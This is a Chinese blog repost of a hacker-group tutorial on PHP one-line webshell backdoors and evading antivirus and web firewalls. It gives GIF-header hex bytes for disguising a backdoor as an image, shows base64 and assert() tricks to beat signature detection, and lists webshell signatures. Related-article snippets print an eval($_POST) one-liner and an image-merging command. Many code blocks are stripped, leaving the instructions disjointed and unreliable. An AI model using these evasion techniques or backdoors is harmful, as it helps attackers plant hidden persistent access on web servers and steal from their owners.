silic group第五版php木马,php一句话后门特征码与免杀-zz

最新推荐文章于 2024-04-02 13:01:55 发布
最新推荐文章于 2024-04-02 13:01:55 发布
阅读量445 收藏
点赞数
文章标签: silic group第五版php木马

作者:YoCo Smart

来自:Silic Group Hacker Army [BlackBap.Org]

首先我们要明白什么是一句话木马。

“一句话”是一种特征性很强的脚本后门的统称和简称,其特征就是代码很短,短到甚至只有一句话,但是却能用这句很短的代码,完成无数的复杂功能。

我们来对下面这样的一个一句话进行简单剖析:

复制代码

这是php的一句话后门中最普遍的一种。它的工作原理是这样的:

首先存在一个变量,变量名为bckdor,bckdor的取值为HTTP的POST方式。Web服务器对bckdor取值以后,然后通过eval_r()函数执行bckdor里面的内容。

那么这个一句话的完整格式就是:

复制代码

例如我们要执行phpinfo();来查看系统的php环境信息,就

复制代码

我们就能查看phpinfo()了。关于客户端我们不多赘言,我们只看一句话木马。

原来的一句话中,我们可以注意到多出来一个变量$bkd,这是为了让大家看的更明白。

$bkd暂存bckdor的内容,然后再递交给eval_r()执行。

说了这么多,原理讲明白了。但是毕竟因为体积过小,使用函数过少,很容易被杀软清除,而且现在有很多的防火墙和防护软件尤其是Web防护程序,拦截的是死死的

我们先来说非常一个常见的拦截系统,上传的时候上传一句话,系统提示上传的有关键字。一句话都有关键字了,其他大马就更不行了。

那么说一下这种拦截方式的突破方法。拦截原理其实就是简单的审查ascii码,如果我们把文件换成HEX码格式或者加上gif头部的话。。。拦截系统就没用了。

那么我们来看看方法。

其实所谓的HEX格式也就是图片格式。我讲一个我常用的方法吧。

用Winhex新建一个文件,设定大小为70字节,将下面的内容覆盖进去

4749463839610A000E00E70000000000800000008000808000000080800080008080C0C0C0C0DCC0

复制代码

覆盖方式为ASCII转HEX,这样就覆盖了前40个字节,这40个字节的内容是GIF的头部格式。然后在第70个字节,也就是最后一个字节上写入3C,也就是分号";"

后面还有29个字节呢?我们把GIF的头和脚构造出来了,虽然头像火星人,脚像水星人,不过和一句话这个身子组合起来,还是有点“图片”范儿的。

那么中间这27个字节就是:

复制代码

还有那俩字节你就自由发挥好了,例如c换成cmd之类的。我只是为了凑个整数,看着差不多,建了个70字节而已,没有什么其他特殊寓意。

还有个方法,你可以屏幕截个很小很小的图,然后保存为xx.gif用Winhex编辑,方法同上。

这个方法是举一反三的,最不建议的就是用记事本直接在一句话前面加GIF89a?这个方法了。因为记事本会留下BOM头部,出来的文件如果非常非常严格拦截的话,是轻易就被拦截的。

要说这个HEX格式文件的突破拦截方法是真不错,可是就是有些杀软和防护软件不从POST数据拦截,直接从执行处拦截,传是传上去了,可是一执行就被拦了。

我们看一下特征码拦截法,例如专门拦截特征码"eval_r($_POST[",突破这个嘛也不难。既然这个是特征码法,只要没有把eval禁用,就可以消除掉特征码。

消掉特征码的方法很简单,我们来看一个简单的编码方式:base64编码,这个编码简单而且php自带编码与反编码的函数。

我们把$_POST['c']这串字符进行base64编码,就得到了字符串"JF9QT1NUWydjJ10=",然后在一句话里面这么改:

复制代码

如果把密码改成别的再base64编码,这样的一句话不太容易出现特征码。

说起Base64编码,其实也有个编码的方法,不过很麻烦的

复制代码

用法就是.php?xyz=cmd&cmd=phpinfo();

原理应该很容易分析明白,用GET的方法取值,取值为"cmd",以cmd为名字,取cmd的值再执行,当然可以GET多次扩展。

例如我们套5个圈:

复制代码

然后这样:

.php?x1=x2&x2=x3&x3=x4&x4=x5&x5=phpinfo();

GET的方式在突破拦截和监控上面其实并不是很实用。

因为我们我们看上面的变化,就算是再变来变去,还是有一个eval_r()函数。

这里先整理一份php木马的特征码:

eval一句话特征=>eval_r(

大马read特征 = >>

->read()

大马readdir特征3 = >> readdir(

MYSQL自定义函数语句 = >> returns string

soname

加密特征1 = >>

eval_r(gzinflate(

加密特征2 = >>

eval_r(base64_decode(

加密特征3 = >> base64_decode(

eval一句话2 = >> eval_r(

php复制特征 = >> copy($_FILES

复制特征2 = >> copy ($_FILES

上传特征 = >>

move_uploaded_file($_FILES

上传特征2 = >> move_uploaded_file

($_FILES

小马特征 = >>

str_replace(\'\\\\\',\'/\

复制代码

上面说了,这个eval_r()函数要是禁用了或者被监控了,那岂不是要傻逼了?

当然不会。还有个可以代替eval_r()函数的函数assert(),例如:

复制代码

这两个是可以互换的。不过嘛,assert()比eval_r()既有优点也有缺点。

assert可以通过别的方式定义使用,而eval_r()则不行。缺点是eval_r()一般不会被禁用,assert()经常会被禁用。

我们可以用字符串组合法隐藏assert():

无脸纸片人
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
木马特征免杀
kingbin的博客
11-18 1858
灰鸽子免杀分析
Chinese Shit Silic Group修正版 MS12-02 Exp
04-25
# Silic Group - 技术自由 技术创新 技术共享 技术原创 技术进步 # BlackBap.Org # Win7_x64_sp1/Win_xp_sp3 bug修正 添加time.sleep # Silic Group Hacker Army exp好了 在cmd里 cssg.exe ip 即可
手机连接php大马,习科大马 v5.6
weixin_34151005的博客
03-10 507
Silic Webshell V5.6 使用手册Silic Group Hacker Army后门管理程序欢迎使用Silic Group Hacker Army开发的Web安全测试程序本程序基于php开发和运行,代行数2210 lines, 程序大小135KB(占用空间136KB),本程序未加密,无后门。请将本脚本置于支持php的目录并访问运行,默认密Silic,首字母大写。目录1)主界面-...
silic group第五版php木马,::Silic Group Hacker Army PHP webshell - blackbap.org::
weixin_39724889的博客
03-12 338
$prompt view file/foldernamesizeowner:grouppermsmodifiedactions "; if($tree > 2) for($i=0;$i : ".$group['name']; } else { $owner = $user; } $buff .= "LINK".$owner."".get_perms($pwd)."".date("d-M-Y...
冰蝎php马静态免杀
最新发布
qq_61807674的博客
04-02 1030
其实还有小马哥的腾讯哈勃,但是那个不支持上传webshell,上传压缩包虽然行,但是如果压缩一遍了连冰蝎原马都查杀不出来,就当图一乐了,就不放出来了.....大部分云沙箱和在线查杀我都基本试过了,基本除了安恒云沙箱都能稳过(ah一生之敌),因为我的测试环境是php7.3往上了,没法用assert拼接执行,估计是检测到了eval执行字符串代,所以静态检测没过,太丢脸就不放截图啦,师傅们可以按着自己的想法改改试试()但是也正常,只是做了基础的静态免杀而已,其实处理还是不够到位的,心态要端正,很不错了!
php上传后门,PHP图片后门藏匿攻略
weixin_42298973的博客
03-10 712
我们平时藏匿图片后门是什么流程呢?我们来看一下0x01 初级的藏匿方法:1、建立一个eval.php文件,上面加入我们的后门:Default12、找一张图片1.jpg,最好是从目标网站上下载下来的图片。3、合并图片和php后门:DefaultCopy /b C:\xampp\htdocs\images\1.jpg + C:\xampp\htdocs\images\eval.php C:\xampp...
silic php 马,Silic PHP大马Cookie欺骗漏洞
weixin_31653131的博客
03-26 194
$password="ebd9a3c106064a255aaee28b6eb4f21c";if($_COOKIE['admin_silicpass'] != md5($password)) //如果cookie 里面的admin_silicpass 不等于 md5($password){ob_start();$MSG_TOP = 'LOGIN';if(isset($passt)){$cookie...
Silic
03-28
矽胶
MS12-020利用工具_含bug修正版
03-18
* MS12-020.rb为严格符合rdp数据包规范的ruby...* Chinese Shit Silic Group修正版.py为基于原Chinese Shit的python脚本的bug校正版本 * 添加了time.sleep * * rdp.exe则来自网上广泛流传的花钱购买的版本的利用工具
PEID-Silic.exe
11-25
给电脑入门级别的病毒分析方法——脱壳分析法 首先,我们要了解是那么是壳。多数人都听说过壳,可是大多数人都不知道如何来判断和脱壳。 脱壳方式要按照加壳方式来定,那么如何来来判断加壳方式呢?
Silic_Security_Handbook
02-17
习科论坛的安全白皮书,适合安全技术人员进行网站日志分析,工具使用的入门书籍
silic php 马,webshell/php at master · ailtex/webshell · GitHub
weixin_32384503的博客
03-26 252
另外的一个php webshell 收集项目~hihiAuthor:JohnTroony_oo0oo_08888888088" . "88(| -_- |)0\ = /0___/'---'\___.' \\| |// './ \\||| : |||// \/_ ||||| -:- |||||- \| | \\\ - /// | || \_| ''\---/'' |_/ ...
免杀技术
weixin_34054866的博客
02-13 402
一.关于免杀的来源 为了让我们的***在各种杀毒软件的威胁下活的更久. 二.什么叫免杀和查杀 可分为二类: 1.文件免杀和查杀:不运行程序用杀毒软件进行对该程序的扫描,所得结果。 2.内存的免杀和查杀:判断的方法1运行后,用杀毒软件的内存查杀功能. 2用OD载入, 一.关于免杀的来源 为了让我们的***在各种杀毒软件的威胁下活的更久. 二.什么叫免杀和查杀 可分为二类...
PHP文件上传漏洞原理以及防御姿势
2301_77152761的博客
04-05 1065
0x00 漏洞描述​ 在实际开发过程中文件上传的功能时十分常见的,比如博客系统用户需要文件上传功能来上传自己的头像,写博客时需要上传图片来丰富自己的文章,购物系统在识图搜索时也需要上传图片等,文件上传功能固然重要,但是如果在实现相应功能时没有注意安全保护措施,造成的损失可能十分巨大,为了学习和研究文件上传功能的安全实现方法,我将在下文分析一些常见的文件上传安全措施和一些绕过方法。​ 我按照最常见的上传功能–上传图片来分析这个漏洞。
木马病毒隐身穿墙术解密之修改特征和加壳
HIT_ZOE的博客
09-18 2674
木马病毒隐身穿墙术解密之修改特征和加壳 作者:比特网 | 比特网 本文关键词:安全 病毒 木马   现在,木马病毒在各种安全防范措施的拦截之下,依然没有任何减少的迹象,甚至还在向更多的方向发展。在防范木马程序这个问题上,造成当前这种局面的主要因素之一,就是木马病毒的开发者和使用者,总是在不断地开发各种帮助木马病毒在杀毒软件面前完全“隐身”,以及可以自由穿透各种防
php 一句话木马简介
whatday的专栏
07-01 1万+
一句话木马就是一段简单的代,就这短短的一行代,就能做到和大马相当的功能。一句话木马短小精悍,而且功能强大,隐蔽性非常好,在入侵中始终扮演着强大的作用。 一句话木马工作原理 <?php @eval($_POST['shell']);?> 这是php一句话后门中最普遍的一种。它的工作原理是: 首先存在一个名为shell的变量,shell的取值为HTTP的POST方式。Web服务器对shell取值以后,然后通过eval()函数执行shell里面的内容。 实例: <?php @ev
免杀】————2、php免杀木马的思路
Fly_鹏程万里
03-04 1638
一般的,利用能够执行系统命令、加载代的函数,或者组合一些普通函数,完成一些高级间谍功能的网站后门的脚本,叫做 Webshell。 本篇文章主要探讨关于 PHP 语言的 Webshell 检测工具和平台的绕过方法,实现能够绕过以下表格中 7 个主流(基本代表安全行业内 PHP Webshell检测的一流水平)专业工具和平台检测的 PHP Webshell,构造出零提示、无警告、无法被检测到的一句...
PHP一句话木马免杀学习
qq_45780190的博客
05-11 2935
PHP一句话木马免杀学习 简单了解php一句话木马原理 <?php @eval($_POST['shell']);?> 首先存在一个名为shell的变量,shell的取值为HTTP的POST方式。Web服务器对shell取值以后,然后通过eval()函数执行shell里面的内容。 将以上代写入webshell.php文件中然后放在站点目录下通过浏览器访问,以POST方式传入shell=phpinfo(); 一句话木马的变形 常用变形函数 convert_uudecode() #解一个
病毒木马查杀实战第018篇:病毒特征查杀之基本原理
热门推荐
Gleam的专栏
04-20 2万+
前言 在本系列的导论中,我曾经在“病毒查杀方法”中简单讲解过特征查杀这种方式。而我也在对于实际病毒的专杀工具编写中,使用过CRC32算法来对目标程序进行指纹匹配,从而进行病毒判定。一般来说,类似于MD5以及CRC32这样的算法,在病毒大规模爆发时是可以提高查杀效率的,但是传统的更为常用的方法是采用以静态分析文件的结构为主并结合动态分析的方法,通过反汇编来寻找病毒的内容代段、入口点代
函数注入攻击
要啥啥不行,偷懒第一名
10-21 1778
实验目的与要求 1.了解eval注入的概念 2.了解eval注入攻击的方式 3.掌握防范攻击的方法 预备知识 eval注入攻击    Eval函数会将输入的字符串参数作为PHP程序代来执行,用户可以将PHP程序代保存在数据库的字段中,然后读入到eval函数中来执行。    Eval函数的用法如下: mixed eval ( string code_str )    code str是代字符串,eval注入(eval injection)攻击发生在黑客能够控制eval函数...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值